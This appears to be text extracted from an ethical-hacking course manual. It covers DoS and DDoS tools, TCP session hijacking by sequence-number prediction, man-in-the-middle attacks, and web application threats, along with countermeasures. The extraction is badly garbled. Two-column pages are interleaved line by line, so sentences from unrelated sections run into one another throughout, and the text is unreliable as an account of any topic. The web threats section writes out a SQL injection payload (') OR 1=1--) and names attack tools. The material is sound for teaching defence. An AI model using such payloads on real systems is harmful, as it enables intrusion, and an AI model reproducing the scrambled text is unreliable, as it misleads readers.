first packet in the buffer so that other, legitimate connection requests cant be
to a number of hosts within the receiving sites local network. The packet also
accommodated. Although the packet in the buffer is dropped after a certain
indicates that the request is from another site, the target site that is to receive
period of time without a reply, the effect of many of these bogus connection
the denial of service. (Sending a packet with someone elses return address in
requests is to make it difficult for legitimate requests for a session to get es-
it is called spoofing the return address.) The result will be lots of ping replies
tablished. In general, this problem depends on the operating system providing
flooding back to the innocent, spoofed host. If the flood is great enough, the
correct settings or allowing the network administrator to tune the size of the
spoofed host will no longer be able to receive or distinguish real traffic.
buffer and the timeout period.

iv. TEARDROP ATTACK vi. Bubonic is a DoS tool which works by sending TCP packets with ran-
dom settings in order to increase the load of the target machine so that
it eventually crashes.
vii. Targa is a program that can be used to run eight different DoS attacks.
The attacker has the option to either launch individual attacks or try all
of the attacks until one is successful.
viii. RPC Locator is a service that, if unpatched, has a vulnerability to buf-
fer overflows. The RPC Locator service in Windows allows distributed
applications to run on the network. It is susceptible to DoS attacks, and
many of the tools that perform DoS attacks exploit this vulnerability.
This type of denial of service attack exploits the way that the Internet Protocol Tools for DDos Attack
(IP) requires a packet that is too large for the next router to handle be divided
into fragments. The fragment packet identifies an offset to the beginning of i. Trinoo is a tool which sends User Datagram Protocol (UDP) traffic to
create a DDoS attack. The Trinoo master is a system used to launch a
the first packet that enables the entire packet to be reassembled by the receiv-
DoS attack against one or more target systems. The master instructs
ing system. In the teardrop attack, the attackers IP puts a confusing offset
agent processes (called daemons) on previously compromised systems
value in the second or later fragment. If the receiving operating system does
(secondary victims), to attack one or more IP addresses. This attack
not have a plan for this situation, it can cause the system to crash. occurs for a specified period of time. The Trinoo agent or daemon is
installed on a system that suffers from buffer overflow vulnerability.
WinTrinoo is a Windows version of Trinoo and has the same function-
TOOLS FOR DOS ATTACK ality as Trinoo.
i. Ping of Death is an attack that can cause a system to lock up by send- ii. Shaft is a derivative of the Trinoo tool that uses UDP communication
ing multiple IP packets, which will be too large for the receiving system between masters and agents. Shaft provides statistics on the flood at-
when reassembled. Ping of Death can cause Denial of Service to clients tack that attackers can use to know when the victim system is shut
trying to access the server that has been a victim of the attack. down; Shaft provides UDP, ICMP, and TCP flooding attack options.
ii. SSPing is a program that sends several large fragmented, Internet Con- iii. Tribal Flood Network (TFN) allows an attacker to use both band-
trol Message Protocol (ICMP) data packets to a target system. This will width-depletion and resource depletion attacks. TFN does UDP and
cause the computer receiving the data packets to freeze when it tries to ICMP flooding as well as TCP SYN and smurf attacks. TFN2K is based
reassemble the fragments. A LAND attack sends a packet to a system on TFN, with features designed specifically to make TFN2K traffic diffi-
where the source IP is set to match the target systems IP address. As cult to recognize and filter. It remotely executes commands, hides the
a result, the system attempts to reply to itself, causing the system to source of the attack using IP address spoofing and uses multiple trans-
create a loop which will tie up system resources and eventually may port protocols including UDP, TCP, and ICMP.
crash the OS.
iv. Stacheldraht is similar to TFN and includes ICMP flood, UDP flood,
iii. CPU Hog is a DoS attack tool that acquires the CPU resources on a tar- and TCP SYN attack options. It also provides a secure Telnet connection
get system, making it unavailable or slow to the user. (using symmetric key encryption) between the attacker and the agent
iv. WinNuke is a program that looks for a target system with port 139 open systems (secondary victims). This prevents system administrators from
and sends junk IP traffic to the system on that port. This attack is also intercepting and identifying this traffic.
known as an Out of Bounds (OOB) attack and causes the IP stack to v. Mstream uses spoofed TCP packets with the ACK flag set to attack a
become overloaded and eventually the system crashes. target. It consists of a handler and an agent portion, but access to the
v. Jolt2 is a DoS tool that sends a large number of fragmented IP packets handler is password protected.
to a Windows target. These tie up system resources and eventually lock DOS/DDOS COUNTERMEASURES
up the system; Jolt2 isnt Windows specific; many Cisco routers and
other gateways may be vulnerable to the Jolt2 attack. There are several ways to detect, halt or prevent DoS attacks. The following
are common security features available:

i. Network-ingress filtering viii. Switches
All network access providers should implement network-ingress filter-
Most switches have some rate-limiting and ACL capability. Some switch-
ing to stop any downstream networks from injecting packets with faked
es provide automatic and/or system-wide rate limiting, traffic shaping,
or spoofed addresses into the Internet. Although this doesnt stop an
delayed binding (TCP splicing), deep packet inspection and Bogon filter-
attack from occurring, it does make it much easier to track down the
ing (bogus IP filtering) to detect and remediate denial of service attacks
source of the attack and terminate the attack quickly.
through automatic rate filtering and WAN Link failover and balancing
ii. Rate-limiting network traffic
A number of routers in the market today have features that let you lim- These schemes will work as long as the DoS attacks are something that
it the amount of bandwidth some types of traffic can consume. This is can be prevented by using them. For example, SYN flood can be pre-
sometimes referred to as traffic shaping. vented using delayed binding or TCP splicing. Similarly, content based
DoS can be prevented using deep packet inspection. Attacks originating
iii. Intrusion detection systems from dark addresses or going to dark addresses can be prevented using
Use an intrusion detection system (IDS) to detect attackers who are Bogon filtering. Automatic rate filtering can work as long as you have
communicating with slave, master, or agent machines. Doing so lets set rate-thresholds correctly and granularly. Wan-link failover will work
you know whether a machine in your network is being used to launch a as long as both links have DoS/DDoS prevention mechanism.
known attack but probably wont detect new variations of these attacks
or the tools that implement them. Most IDS vendors have signatures to ix. Routers
detect Trinoo, TFN or Stacheldraht network traffic.
Similar to switches, routers have some rate-limiting and ACL capabil-
iv. Host-auditing tools ity. They too, are manually set. Cisco IOS has features that prevents
File-scanning tools are available that attempt to detect the existence of flooding, i.e. example settings.
known DDoS tool client and server binaries in a system.
v. Network-auditing tools x. Application front end hardware
Network-scanning tools are available that attempt to detect the pres- Application front end hardware is intelligent hardware placed on the
ence of DDoS agents running on hosts on your network. network before traffic reaches the servers. It can be used on networks
in conjunction with routers and switches. Application front end hard-
vi. Automated network-tracing tools
ware analyzes data packets as they enter the system and then identifies
Tracing streams of packets with spoofed address through the network
them as priority, regular or dangerous.
is a time-consuming task that requires the cooperation of all networks
carrying the traffic and that must be completed while the attack is in
progress. xi. IPS based prevention
Intrusion-prevention systems (IPS) are effective if the attacks have sig-
vii. DoS Scanning Tools
natures associated with them. However, the trend among the attacks is
Find_ddos is a tool that scans a local system which likely contains a
to have legitimate content but bad intent. Intrusion-prevention systems
DDoS program. It can detect several known DoS attack tools.
which work on content recognition cannot block behavior-based DoS
SARA gathers information about remote hosts and networks by exam- attacks.
ining network services. This includes information about the network
information services as well as potential security flaws such as incor- An ASIC based IPS can detect and block denial of service attacks be-
rectly set up or configured network services, well-known bugs in the cause they have the processing power and the granularity to analyze
system or network utilities system software vulnerabilities listed in the the attacks and act like a circuit breaker in an automated way.
Common Vulnerabilities and Exposures (CVE) database, and weak pol-
icy decisions. A rate-based IPS (RBIPS) must analyze traffic granularly and continu-
ously monitor the traffic pattern and determine if there is traffic anom-
RID is a free scanning tool that detects the presence of Trinoo, TFN or aly. It must let the legitimate traffic flow while blocking the DoS attack
Stacheldraht clients. Zombie Zapper instructs zombie routines to go to traffic.
sleep, thus stopping their attack. You can use the same commands an
attacker would use to stop the attack. DOS (Denial of Service) or DDoS (Distributed Denial of Service) attacks
are the single largest threat to our Internet and the Internet of Things.
The more our world becomes connected and dependent on the Internet,

the more opportunities there are to thwart everyday lifestyle necessities 1. Tracking the Session
in our IoT. Here are some of the more recent examples:
The hacker identifies an open session and predicts the sequence num-
ber of the next packet.
Case Study: CyberBunker Launches Worlds Largest DDoS Attack, Slows 2. Desynchronizing the Connection
down the Entire Internet. A massive cyber attack launched by the Dutch web
hosting company CyberBunker has caused global disruption of the web, slow- The hacker sends the valid users system a TCP reset (RST) or finish
ing down internet speeds for millions of users across the world, according to a (FIN) packet to cause them to close their session.
BBC report. CyberBunker launched an all-out assault, described by the BBC
3. Injecting the Attackers Packet
as the worlds biggest ever cyber attack, on the self-appointed spam-fighting
company Spamhaus, which maintains a blacklist used by email providers to The hacker sends the server a TCP packet with the predicted sequence
filter out spam. number and the server accepts it as the valid users next packet.
Case Study: Stuxnet is a highly sophisticated computer worm. Discovered Hackers can use two types of session hijacking:
in June 2010, Stuxnet initially spreads via Microsoft Windows and targets
Siemens industrial software and equipment. The worm initially spreads in- Active and Passive
discriminately, but includes a highly specialized malware payload that is de-
The primary difference between active and passive hijacking is the hackers
signed to target only Siemens supervisory control and data acquisition (SCA-
level of involvement in the session.
DA) systems that are configured to control and monitor specific industrial
processes. Stuxnet infects PLCs by subverting the software application that is In an active attack, an attacker finds an active session and takes over the
used to reprogram these devices. Because of this, PLCs deny to give services session by using tools that predict the next sequence number used in the TCP
require for specific processes; this means it is a Denial of Service (DoS) attack. session.
In a passive attack, an attacker hijacks a session and then watches and re-
cords all the traffic that is being sent by the legitimate user.
Session Hijacking
Passive session hijacking is really no more than sniffing. It gathers informa-
Introduction tion such as passwords and then uses that information to authenticate as a
separate session.
In Session Hijacking, a hacker takes control of a user session after the user
has successfully authenticated with a server. Session hijacking involves an
TCP - Connection Oriented Protocol
attack identifying the current session IDs of a client/server communication
and taking over the clients session. Session hijacking is made possible by The Sequence and Acknowledgement fields are two of the many features that
tools that perform sequence-number prediction. Spoofing attacks are differ- help us classify TCP as a connection oriented protocol. As such, when data is
ent from hijacking attacks. In a spoofing attack, the hacker performs sniffing sent through a TCP connection, they help the remote hosts keep track of the
and listens to traffic as it is passed along the network from sender to receiver. connection and ensure that no packet has been lost on the way to its desti-
The hacker then uses the information gathered to spoof or uses an address of nation.
a legitimate system.
TCP utilizes positive acknowledgments, timeouts and retransmissions to en-
Hijacking involves actively taking another user offline to perform the attack. sure error-free, sequenced delivery of user data. If the retransmission timer
The attacker relies on the legitimate user to make a connection and authen- expires before an acknowledgment is received, data is retransmitted starting
ticate. After that, the attacker takes over the session and the valid users ses- at the byte after the last acknowledged byte in the stream.
sion is disconnected.
Sequence numbers are generated differently on each operating system. Using
Session hijacking involves the following three steps to perpetuate an attack:
special algorithms (and sometimes weak ones), an operating system will gen-
erate these numbers, which are used to track the packets sent or received and
since both Sequence and Acknowledgement fields are 32bit, there are 2^32=
4,294,967,296 possibilities of generating a different number!

TCP Concepts: Three-Way Handshake the packets arrive out of order, as happens regularly over the Internet, then
the SN is used to stream the packets correctly. As just illustrated, the system
Two of the key features of TCP are reliability and ordered delivery of packets.
initiating a TCP session transmits a packet with the SYN bit set. This is called
To accomplish these goals, TCP uses acknowledgment (ACK) packets and se-
a synchronize packet and includes the clients ISN. The ISN is a pseudo-ran-
quence numbers. Manipulating these numbers is the basis for TCP session
domly generated number with over 4 billion possible combinations; yet it is
hijacking. To understand session hijacking, lets review the TCP three-way
statistically possible for it to repeat. When the ACK packet is sent, each ma-
handshake.
chine uses the SN from the packet being acknowledged, plus an increment.
1. The valid user initiates a connection with the server. This is accom- This not only properly confirms receipt of a specific packet, but also tells the
plished by the valid user sending a packet to the server with the SYN sender the next expected TCP packet SN. Within the three-way handshake,
bit set and the users initial sequence number (ISN). the increment value is 1. In normal data communications, the increment val-
ue equals the size of the data in bytes (for example if you transmit 45 bytes of
2. The server receives this packet and sends back a packet with the SYN data, the ACK responds using the incoming packets SN plus 45).
bit set and an ISN for the server, plus the ACK bit set identifying the
users ISN incremented by a value of 1.
Initial Sequence Number (ISN) Prediction: When two hosts need to transfer
3. The valid user acknowledges the server by returning a packet with the data using the TCP transport protocol, a new connection is created. This in-
ACK bit set and incrementing the servers ISN by 1. volves the first host that wishes to initiate the connection, to generate what is
called an Initial Sequence Number (ISN), which is basically the first sequence
This connection can be closed from either side due to a timeout or upon number thats contained in the Sequence field we are looking at. The ISN has
receipt of a package with the FIN or RST flag set. always been the subject of security issues, as it seems to be a favorite way for
hackers to hijack TCP connections.
Upon receipt of a packet with the RST flag set, the receiving system closes
the connection, and any incoming packets for the session are discarded.
Every operating system uses its own algorithm to generate an ISN for every
If the FIN flag is set in a packet, the receiving system goes through the pro- new connection; so all a hacker needs to do is figure out or rather predict
cess of closing the connection and any packets received while closing the which algorithm is used by the specific operating system, generate the next
connection are still processed. Sending a packet with the FIN or RST flag predicted sequence number and place it inside a packet that is sent to the
set is the most common method hijackers use to close the clients session other end. If the attacker is successful, the receiving end is fooled and thinks
with the server and take over the session by acting as the client. the packet is a valid one coming from the host that initiated the connection.
At the same time, the attacker will launch a flood attack to the host that ini-
tiated the TCP connection, keeping it busy so it wont send any packets to the
remote host with which it tried to initiate the connection.
Here is a brief illustration of the above-mentioned attack:
In this example, a valid user (host A) initiates a connection with Internet

Banking Server and the hacker hijacks the connections.
Initial Sequence Number (ISN): TCP is a connection-oriented protocol, re-

sponsible for reassembling streams of packets into their original intended
order. Every packet has to be assigned a unique session number that enables
the receiving machine to reassemble the stream of packets into their original
and intended order; this unique number is known as a sequence number. If

Step1 Timing is critical for the hacker, so he sends his first fake packet to the In-
ternet Banking Server while at the same time starts flooding Host A with gar-
bage data in order to consume the hosts bandwidth and resources. By doing
so, Host A is unable to cope with the data its receiving and will not send any
packets to the Internet Banking Server.
The fake packet sent to the Internet Banking Server will contain valid head-
ers, meaning it will seem like it originated from Host As IP Address and will
be sent to the correct port the Internet Banking Server is listening to.
In most cases, hackers will first sample TCP ISNs from the host victim, look-
ing for patterns in the initial sequence numbers chosen by TCP implementa-
tions when responding to a connection request. Once a pattern is found, its
only a matter of minutes for connections initiated by the host to be hijacked.
Example of Sequence and Acknowledgment Numbers
To help us understand how these newly introduced fields are used to track a
As described, the hacker must find the ISN algorithm by sampling the Ini- connections packets, an example is given below.
tial Sequence Numbers used in all new connections by Host A. Once this is
In this example, a valid Host A initiates a connection with a Web Server (Gate-
complete and the hacker knows the algorithm, they are ready to initiate their
way Server) on the Internet to download some pages.
attack.
Before we proceed, we should note that you will come across the terms ACK
flag or SYN flag; these terms should not be confused with the Sequence and
Acknowledgment numbers as they are different fields within the TCP header.
Step2 The screen shot below is to help you understand.
You can see the Sequence number and Acknowledgement number fields, fol-
lowed by the TCP Flags to which were referring.
To keep things simple, remember that when talking about Sequence and Ac-
knowledgement numbers, we are referring to the 1st selected section, while
SYN and ACK flags refer to 2nd selected section.
The next diagram shows the establishment of a new connection to a web serv-

er - the Gateway Server. The first three packets are part of the 3-way hand- Step 1
shake performed by TCP before any data is transferred between the two hosts,
while the small screen shot under the diagram is captured by packet sniffer. Host A wishes to download a webpage from the Gateway Server. This requires
a new connection between the two to be established; so Host A sends a pack-
et to the Gateway Server. This packet has the SYN flag set and also contains
the ISN generated by Host As operating system, that is 1293906975 in this
example. Since Host A is initiating the connection and hasnt received a reply
from the Gateway Server, the Acknowledgment number is set to zero (0).
In short, Host A is telling the Gateway Server the following: Id like to initi-
ate a new connection with you. My Sequence number is 1293906975.
Step 2
To make sure we understand what is happening here, we will analyse the ex- The Gateway Server receives Host As request and generates a reply contain-
ample step by step. ing its own generated ISN, that is 3455719727 in this example, and the next
Sequence number it is expecting from Host A which is 1293906976. The Serv-
er also has the SYN & ACK flags set, acknowledging the previous packet it
received and informing Host A of its own Sequence number.
In short, the Gateway Server is telling Host A the following:

I acknowledge your sequence number and expecting your next packet with
sequence number 1293906976. My sequence number is 3455719727.
Step 4
In this step, Host A generates a packet with some data and sends it to the
Step 3 Gateway Server. The data tells the Gateway Server which webpage it would
like sent.
Host A receives the reply and now knows Gateways sequence number. It
generates another packet to complete the connection. This packet has the
ACK flag set and also contains the sequence number that it expects the
Gateway Server to use next, that is 3455719728.
Note that the sequence number of the segment in line 4 is the same as in line
3 because the ACK does not occupy sequence number space.
So keep in mind that any packets generated, which are simply acknowledg-
In short, Host A is telling the Gateway Server the following: ments (in other words, have only the ACK flag set and contain no data) to
previously received packets, never increment the sequence number.
I acknowledge your last packet. This packets sequence number is
1293906976, which is what youre expecting. Ill also be expecting the next There are other important roles that the Sequence and Acknowledgement
packet you send me to have a sequence number of 3455719728. numbers have during the communication of two hosts. Because segments (or
packets) travel in IP datagram, they can be lost or delivered out of order, so
Now, someone might be expecting the next packet to be sent from the Gate-
the receiver uses the sequence numbers to reorder the segments. The receiver
way Server, but this is not the case. You might recall that Host A initiated the
collects the data from arriving segments and reconstructs an exact copy of the
connection because it wanted to download a web page from the Gateway Serv-
stream being sent.
er. Since the 3-way TCP handshake has been completed, a virtual connection
between the two now exists and the Gateway Server is ready to listen to Host If we have a closer look at the diagram above, we notice that the TCP Ac-
As request. knowledgement number specifies the sequence number of the next segment
expected by the receiver.
With this in mind, its now time for Host A to ask for the webpage it wanted,
which brings us to step number 4. Hacking tools used to perform session hijacking do sequence number predic-
tion. To successfully perform a TCP sequence prediction attack, the hacker
must sniff the traffic between two systems. Next, the hacker or the hacking
tool must successfully guess the SN or locate an ISN to calculate the next se-
quence number. This process can be more difficult than it sounds, because
packets travel very fast. When the hacker is unable to sniff the connection,
it becomes much more difficult to guess the next SN. For this reason, most
session-hijacking tools include features to permit sniffing the packets to de-
termine the SNs. Hackers generate packets using a spoofed IP address of the
system that had a session with the target system. The hacking tools issue
packets with the SNs that the target system is expecting. But the hackers

packets must arrive before the packets from the trusted system whose con- Most computers are vulnerable.
nection is being hijacked. This is accomplished by flooding the trusted system
with packets or sending an RST packet to the trusted system so that it is un- Few countermeasures are available to adequately protect against it.
available to send packets to the target system. Session hijacking attacks are simple to launch.
Hacking tools Hijacking is dangerous because of the information that can be gath-
ered during the attack.
Juggernaut is a network sniffer that can be used to hijack TCP sessions. It
runs on Linux operating system and can be used to watch for all network
traffic, or it can be given a keyword such as a password to look for. The pro-
Preventing Session Hijacking
gram shows all active network connections and the attacker can then choose
a session to hijack. To defend against session hijack attacks, a network should employ several
defences. The most effective protection is encryption, such as Internet Proto-
Hunt is a program that can be used to sniff and hijack active sessions on a col Security (IPSec). This also defends against any other attack vectors that
network. Hunt performs connection management, Address Resolution Proto- depend on sniffing. Attackers may be passively monitoring your connection,
col (ARP) spoofing, resetting of connections, monitoring of connections, Media but they wont be able to interpret the encrypted data.
Access Control (MAC) address discovery and sniffing of TCP traffic.
Other countermeasures include using encrypted applications such as Secure
TTYWatcher is a session-hijacking utility that allows the hijacker to return
Shell (SSH, an encrypted telnet) and Secure Sockets Layer (SSL, for HTTPS
the stolen session to the valid user as though it was never hijacked. TTY-
traffic).
Watcher is only for Sun Solaris systems.
You can help prevent session hijacking by reducing the potential methods of
gaining access to your network for example, by eliminating remote access to
IP Watcher is a session-hijacking tool that lets an attacker monitor connec- internal systems. If the network has remote users who need to connect to car-
tions and take over a session. This program can monitor all connections on ry out their duties, then use virtual private networks (VPNs) that have been
a network, allowing the attacker to watch an exact copy of a session in real secured with tunnelling protocols and encryption (Layer 3 Tunnelling Protocol
time. [L3TP]/Point-to-Point Tunnelling Protocol [PPTP] and IPSec).
The use of multiple safety nets is always the best countermeasure to any po-
tential threat. Employing any one countermeasure may not be enough, but
T-Sight is a session-monitoring and -hijacking tool for Windows that can as-
using them together to secure your enterprise will make the attack success
sist when an attempt at a network break-in or compromise occurs.
rate minimal for anyone but the most professional and dedicated attacker.
Dangers Posed by Session Hijacking

Countermeasures
TCP session hijacking is a dangerous attack: most systems are vulnerable to
The following is a checklist of countermeasures that should be employed to
it, because they use TCP/IP as their primary communication protocol. Newer
prevent session hijacking:
operating systems have attempted to secure themselves from session hijack-
ing by using pseudo-random number generators to calculate the ISN, making
the sequence number harder to guess. However, this security measure is in-
Use encryption.
effective if the attacker is able to sniff packets, which gives all the information
required to perform this attack. Use a secure protocol.
Limit incoming connections.
The following are reasons why its important for an Ethical Hacker EH to be
aware of session hijacking: Minimize remote access.
Have strong authentication.
Educate your employees.
Maintain different username and passwords for different accounts.
Use Ethernet switches rather than hubs to prevent session hijacking
attacks.

In the image above, you will notice that the attacker inserted himself/herself
in-between the flow of traffic between client and server. Now that the attacker
Man-In-The Middle Attack
has intruded into the communication between the two endpoints, he/she can
inject false information and intercept the data transferred between them.
A man-in-the-middle attack is one in which the attacker secretly intercepts
and relays messages between two parties who believe they are communicating
directly with each other. Its a form of eavesdropping but the entire conver-
sation is controlled by the attacker, who even has the ability to modify the
content of each message.
Often abbreviated to MITM, MitM or MITMA, and sometimes referred to as a

session hijacking attack, it has a strong chance of success if the attacker can
impersonate each party to the satisfaction of the other. MITM attacks pose a
serious threat to online security because they give the attacker the ability to
capture and manipulate sensitive information in real-time while posing as a
trusted party during transactions, conversations and the transfer of data.
Key Concepts of a Man-in-the-Middle Attack
Man-in-the-middle is a type of eavesdropping attack that occurs when

Interactions Susceptible to MITM Attacks
a malicious user inserts himself as a relay/proxy into a communication
session between people or systems. Financial sites between login and authentication
A MITM attack exploits the real-time processing of transactions, con- Connections meant to be secured by public or private keys
versations or transfer of other data. Other sites that require logins where there is something to be gained
by having access
Man-in-the-middle attacks allow attackers to intercept, send and re-
ceive data never meant to be for them without either outside party One common method of executing a MITM attack involves distributing mal-
knowing until it is too late. ware that provides access to a users Web browser and the data it sends and
receives. Malware can also be used to add entries to the local Hosts file DNS
Man-in-the-Middle Attack Examples cache positioning to redirect users to a site controlled by the attacker that
looks exactly the same as the site the user is expecting to reach. The attacker
then creates a connection to the real site and acts as a proxy, being able to
read, insert and modify the traffic between the user and the legitimate site
before forwarding them on.
Online banking and e-commerce sites are frequently the target of MITM at-
tacks as they can capture login credentials and other sensitive data even if the
site encrypts communications using SSL/TLS.
An attacker can also exploit vulnerabilities in a wireless routers security con-

figuration such as a weak password to launch a MITM attack and intercept
information being sent through the router. A malicious router can also be
setup in a public place like a caf or hotel for the same purpose. Other ways
that attackers can carry out a man in the middle attack include ARP spoofing,
DNS spoofing; port stealing, DHCP spoofing, ICMP redirection, traffic tunnel-
ling and route mangling.
Below is another example of what might happen once the man in the middle
has inserted himself/herself.

1 Introduction
As most businesses rely on web sites to deliver content to their customers,
interact with customers and sell products, certain technologies are often de-
ployed to handle the different tasks of a web site. A content management sys-
tem like Joomla or Drupal may be the solution used to build a robust web site
filled with product or service related content. ZenCart and Magento are often
the solutions to the e-commerce needs of both small and large businesses
who sell directly on the web. Add in the thousands of proprietary applications
that web sites rely on and the reason securing web applications should be a
top priority for any web site owner, no matter how big or small.
MITM is really a difficult type to tackle and hence should be taken seriously
by IT management. It can result in data theft causing severe reputational
and monetary losses to corporate firms. As a bottom-line, having a correctly
defined security perimeter defence design, server and network components
hardening, implementing robust patch management system and following
best security practices can help fix MITM attacks. Since this attack may not
be visible, being vigilant in terms of network problems and performance al-
ways helps detect it, before a data theft can occur.
Web Server Hacking Web Application Hacking

Objective
Various high-profile hacking attacks have proven thatweb securityremains
Introduction the most critical issue to any business that conducts its operations online.
Risk Associated With Web Application Web servers are one of the most targeted public faces of an organization,
because of the sensitive data they usually host. Securing a web server is as
Anatomy of Web Attack important as securing the website or web application itself and the network
around it. If you have a secure web application and an insecure web server or
Web Application Threats vice versa, it still puts your business at a huge risk. Your companys security
is as strong as its weakest point.
Hacking Tools
Countermeasures Although securing a web server can be a daunting operation and requires
specialist expertise, it is not an impossible task. Long hours of research and
Hacking of Web Server an overdose of coffee and take away food can save you from long nights at the
Hardening of Web Server office, headaches and data breaches in the future. Irrelevant of which web
server software and operating system you are running, an out of the box con-
figuration is usually insecure. Therefore one must take some necessary steps
in order to increase web server security.

2 Risks Associated with Web Applications
Web applications allow visitors access to the most critical resources of a web
site, the web server and the database server. Like any software, developers of
web applications spend a great deal of time on features and functionality and
dedicate very little time to security. Its not that developers dont care about
security; nothing could be further from the truth. The reason so little time is
spent on security is often due to a lack of understanding of security on the
part of the developer or a lack of time dedicated to security.
For whatever reason, applications are often riddled with vulnerabilities that
are used by attackers to gain access to either the web server or the database
server. From there, any number of things can happen. They can:
Deface a web site

Insert spam links directing visitors to another site
Insert malicious code that installs itself onto a visitors computer
Insert malicious code that steals session IDs (cookies)
Steal account information (Credit Card)
Steal information stored in the database
Access restricted content
Do Domain Naming System Attack
4 Web Application Threats:
Perform Denial Of Service
Malicious users will examine a website and its infrastructure to understand
Exploit Buffer Overflow vulnerabilities
its design and identify any potential weakness that can be exploited. Web ap-
Exploit Server Side Scripting plication vulnerabilities provide the potential for an unauthorized user to gain
3 Anatomy of Web Application Attack: access to critical information, use resources inappropriately or interrupt legit-
imate campus business. How the exploitation is carried out depends upon the
Hackers always find new ways to compromise your web applications securi- weakness found and the goal of the exploiter. Many web application threats
ty but there are patterns they follow in every attempt of an attack. Knowing exist on a web server. The following are the most common threats:
these patterns is essential for closing security gaps and preventing your sys-
tem from being hacked.

Cross-site scripting SQL Injection
Cross-site Scripting (XSS) refers to client-side code injection attack SQL Injection works by the attacker finding an area on a web site that
wherein an attacker can execute malicious scripts (also commonly re- allows for user input that is not filtered for escape characters. User
ferred to as a malicious payload) into a legitimate website or web appli- login areas are often targeted because they have a direct link to the da-
cation. XSS is amongst the most rampant of web application vulnera- tabase since credentials are often checked against a user table of some
bilities and occurs when a web application makes use of un-validated sort. By injecting a SQL statement, like ) OR 1=1--, the attacker can
or un-encoded user input within the output it generates. access information stored in the web sites database. Of course, the ex-
ample used above represents a relatively simple SQL statement. Ones
By leveraging XSS, an attacker does not target a victim directly. In-
used by attackers are often much more sophisticated if they know what
stead, an attacker would exploit a vulnerability within a website or web
the tables in the database are since these complex statements can gen-
application that the victim would visit, essentially using the vulnerable
erally produce better results.
website as a vehicle to deliver a malicious script to the victims browser.
While XSS can be taken advantage of within VBScript, ActiveX and
Flash (although now considered legacy or even obsolete), unquestion-
ably, the most widely abused is JavaScript primarily because JavaS-
cript is fundamental to most browsing experiences.

Command injection: Authentication Hijacking:
Command Execution vulnerabilities allow attackers to pass arbitrary The hacker steals a session once a user has authenticated. Session hi-
commands to other applications. In severe cases, the attacker can ob- jacking is the act of taking control of a user session after successfully
tain system level privileges allowing them to attack the servers from a obtaining or generating an authentication session ID. Session hijacking
remote location and execute whatever commands they need for their involves an attacker using captured, brute forced or reverse-engineered
attack to be successful. session IDs to seize control of a legitimate users Web application ses-
sion while that session is still in progress.
Directory traversal / Unicode:

A directory traversal (or path traversal) consists in exploiting insuffi-
cient security validation/sanitization of user-supplied input file names,
so that characters representing traverse to parent directory are passed
through to the file APIs.
The goal of this attack is to order an application to access acomputer
filethat is not intended to be accessible. This attack exposes the direc-
tory structure of the application and often the underlying web server
and operating system.
Directory traversalis also known as the../(dot dot slash) attack,direc-
toryclimbing and backtracking. Some forms of this attack are alsoca-
nonicalizationattacks.
Cookies/Session Poisoning:
A cookie is a small piece of text stored on a users computer by a web Cryptographic Interception:
browser. It is sent as an HTTP header by a web server to a web browser Cryptography can be used to send confidential message between two
and then sent back unchanged by the browser each time it accesses parties. Encrypted traffic flows through network firewalls and IDS sys-
that server. A cookie can be used for authenticating, session tracking, tem and is not inspected. If an attacker is able to take advantage of a
and remembering specific information about users, such as site prefer- secure channel, he can exploit it more efficiently than an open channel.
ences or the contents of their electronic shopping carts. Attackers can decrypt encrypted data if they have access to the encryp-
The process of tampering with the value of cookies is called cookie poi- tion key or can derive the encryption key. Attackers can discover a key
soning. Poisoning allows an attacker to inject the malicious content, if keys are managed poorly or if they were generated in a non-random
modify the users on-line experience, and obtain the unauthorized in- fashion. An encryption algorithm provides no security if the encryption
formation. A Proxy can be used for rewriting the session data, display- is cracked or is vulnerable to brute force cracking. Custom algorithms
ing the cookie data, and /or specifying a new or other session identifies are particularly vulnerable if they have not been tested.
in the cookie.
Parameter / Form tampering:
Buffer Overflow:
Websites often pass information from one web page to the next through
A buffer overflow occurs when data written to a buffer, due to insuffi- URL parameters. For example, if you search on Google, your search
cient bounds checking, corrupts data values in memory addresses ad- terms will be passed to the results page through the URL. A hacker can
jacent to the allocated buffer. Most commonly this occurs when copying take advantage of this fact to rewrite these parameters in harmful ways.
strings of characters from one buffer to another. It is used to corrupt
the execution stack of a web application.
Cookie Snooping:
In an attempt to protect cookies, site developers often encode the cook-
ies. Cookie snooping techniques can use a local proxy to enumerate
cookies.

Log Tampering: 6. CookieDigger Tool: It helps to identify weak cookie generation and
insecure implementation of session management by web application.
Logs are used to keep track of the usage patterns of the application.
Log tampering allows attackers to cover their tracks or alter web trans-
action records. Attackers strive to delete logs, modify logs, change user 7. SSL Digger Tool: It is a tool to assess the strength of SSL servers by
information or otherwise destroy evidence of any attack. testing the supported ciphers.
Error Message Interception: 8. Acunetix Web Scanner: Acunetix launches all the Google hacking
database queries onto the crawled content of website.
Information in error messages is often rich with site-specific informa-
tion which can help to determine the technologies used in the web ap-
plications. 6 Countermeasures:
Threats Countermeasure
Web Services Attack:
Cross-Site Script- Perform thorough input validation, cookie,
Web services allow process-to-process communication between web ap- ing query string, form fields and hidden field.
plications. An attacker can inject a malicious script into a web service
that will enable disclosure and modification of the data. Adopt Security Policy.
SQL Injection Perform thorough input validation. Your appli-
cation should validate its input prior to sending
Zero-Day Attacks: a request to the database.
Zero-day attacks take place between the time vulnerability is discov- Use parameterized stored procedures for data-
ered by a researcher or attacker and the time that the vendor issues a base access to ensure that input strings are not
treated as executable statements. If you can-
corrective patch. This vulnerability is the launching point for further not use stored procedures, use SQL parameters
exploitation of the web application and environment. when you build SQL commands.
Use least privileged accounts to connect to the
database.
5 Hacking Tools: Command Injection Use language-specific libraries that avoid prob-
lems due to shell commands.
1. Instant Source: Instant Source tool allows us to see and edit the Validate the data to prevent any malicious con-
HTML source code of the web pages. It can be executed from Internet. tent.
2. Wget: Wget is a command line tool for Windows and UNIX. Wget will Structure requests so that all supplied param-
eters are treated as data, rather than poten-
download the contents of website. It works non-interactively in the tially executable content.
background after the user logs off. Cookies/Session Use an encrypted communication channel pro-
Poisoning vided by SSL whenever an authentication cookie
3. Websleuth: Websleuth is a tool that combines spidering with the is transmitted.
Use a cookie timeout to a value that forces au-
capability of a personal proxy.
thentication after a relatively short time interval.
Although this doesnt prevent replay attacks, it re-
4. Blackwidow: Black Widow is a website scanner, a site mapping tool, duces the time interval in which the attacker can
replay a request without being forced to re-au-
a site ripper, a site mirroring tool and an offline browser program. thenticate because the session has timed out.
Buffer Overflow Validate input length in forms
5. WindowBomb: An email sent with this html code attached will cre-
Check bounds and maintain extra care when
ate pop-up windows until the pcs memory gets exhausted. using loops to copy data

Authentication Use secure channels for authentication methods. 7 Hacking Web Servers
